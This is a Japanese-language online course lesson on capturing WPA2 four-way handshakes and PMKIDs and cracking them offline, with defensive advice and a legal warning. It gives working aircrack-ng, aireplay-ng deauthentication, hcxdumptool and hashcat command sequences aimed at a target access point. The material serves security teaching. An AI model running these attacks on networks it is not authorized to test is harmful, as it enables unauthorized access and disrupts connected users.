Cyber Security Academy · レッスン

WPA2ハンドシェイクのキャプチャと解析

aircrack-ngで4ウェイハンドシェイクをキャプチャし、Hashcatで辞書攻撃を試みます。

レッスン 2/413 ステップ

「WPA2ハンドシェイクのキャプチャと解析」はCoddyKit上の無料Cyber Security Academyレッスンです。 これはレッスン2/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはCyber Security Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Cyber Security Academyコースには全4レッスンが含まれています。

4ウェイハンドシェイク

クライアントがWPA2ネットワークに接続すると、4ウェイハンドシェイクによって、PMK(PSKから導出)とランダムなnonceからPairwise Transient Key(PTK)が導出されます。このハンドシェイクをキャプチャすると、オフラインでパスワードをクラックできます。

モニターモードを設定する

モニターモードを使用すると、無線カードは宛先に関係なくすべてのフレームをキャプチャできます。これは、ハンドシェイクを受動的にキャプチャするために必要です。モニターモードに対応したカードでのみ動作します。

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

受動的なハンドシェイクキャプチャ

Airodump-ngはフレームを受動的にキャプチャします。クライアントが自然に接続するまで待つか、deauthenticationによって再接続を強制します。ハンドシェイクをキャプチャすると、airodumpの出力の右上に表示されます。

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

認証解除攻撃

偽装したdeauthフレームを送信すると、接続中のクライアントが切断および再接続され、新しいハンドシェイクのキャプチャが発生します。この攻撃は通信量が多く検出されやすいうえ、クライアントが通信範囲内にいる必要があります。

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

PMKID攻撃:クライアント不要

PMKID攻撃(hcxdumptool)は、接続中のクライアントを必要とせず、ビーコンフレームやプローブフレームからPMKIDをキャプチャします。完全なハンドシェイクよりも速く取得でき、同じようにクラック可能です。

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Hashcatでハンドシェイクをクラックする

キャプチャファイルを変換し、Hashcatのモード22000(WPA2統合形式)またはモード2500(レガシー形式)で攻撃します。最良の結果を得るには、rockyou.txtとルールを併用してください。

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Aircrack-ngでクラックする

Aircrack-ngは、キャプチャファイルから直接、CPUベースでWPA2のクラックを実行します。HashcatによるGPUクラックより低速ですが、形式の変換は必要ありません。

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

ワードリスト戦略

WPA2パスワードのクラックが成功するかどうかは、ワードリストの品質に完全に左右されます。基本となるrockyou.txt、変形用のHashcatルールセット、企業固有のワードリスト(名前+年+記号)、OSINTから作成した対象を絞ったリストを使用してください。

クラックにかかる時間の現実

20文字以上のランダムなWPA2パスワードをクラックするのは、計算上現実的ではありません。クラックが実用的なのは、短いパスワードや辞書ベースのパスワードに対してだけです。だからこそ、複雑さのルールよりもパスワードの長さとランダム性が重要です。

防御策

WPA3-SAE(オフライン辞書攻撃に耐性があります)、または20文字以上のランダムなパスフレーズを使用するWPA2を利用してください。さらに、パスワードの代わりに証明書を使用するEAP-TLS方式のWPA2-Enterpriseも使用してください。

法的な注意

自分が所有していないネットワーク上でWPA2ハンドシェイクをキャプチャすることは違法です。ここで扱うすべての技術は、自分自身のテストネットワークまたは許可を得たラボ環境(ホームラボや専用テストAPなど)でのみ使用してください。

クイックチェック

PMKID攻撃は、標準的なハンドシェイクキャプチャと比べて何を改善しますか?

まとめ:WPA2クラック

WPA2ハンドシェイク(またはPMKID)をキャプチャすると、Wi-Fiのクラックをオフライン辞書攻撃に変えられます。成功するかどうかはパスワードの強度に完全に左右されます。短く辞書ベースのパスワードはすぐに破られますが、長くランダムなパスワードは現実的にはクラックできません。WPA3-SAE、強力なパスフレーズ、企業ネットワーク向けのWPA2-Enterpriseで防御してください。

無料で開始

AI チューターと学ぶ Cyber Security Academy — 無料

ブラウザでリアルコードを書いて実行し、24/7 の AI チューターから瞬時にサポートを受け、ウェブまたはアプリで続きから学習できます。

コース
76
レッスン
303

よくある質問

「WPA2ハンドシェイクのキャプチャと解析」レッスンは無料ですか?

はい。「WPA2ハンドシェイクのキャプチャと解析」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Cyber Security Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Cyber Security Academyコースには全4レッスンが含まれています。

「WPA2ハンドシェイクのキャプチャと解析」で何を学びますか?

aircrack-ngで4ウェイハンドシェイクをキャプチャし、Hashcatで辞書攻撃を試みます。 ブラウザで直接実行するハンズオンコードでCyber Security Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。

Cyber Security Academyを始めるのに経験は必要ですか?

事前経験は必要ありません。CoddyKitのCyber Security Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン2/4です。

「WPA2ハンドシェイクのキャプチャと解析」レッスンにはどのくらい時間がかかりますか?

ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。

このCyber Security Academyレッスンでコードを書いて実行できますか?

はい。すべてのCyber Security Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。

このコースのすべてのレッスン

  1. 802.11セキュリティプロトコル:WEP、WPA2、WPA3
  2. WPA2ハンドシェイクのキャプチャと解析
  3. Evil Twinとキャプティブポータル攻撃
  4. エンタープライズWi-Fi:EAPとRADIUS
← Cyber Security Academyに戻る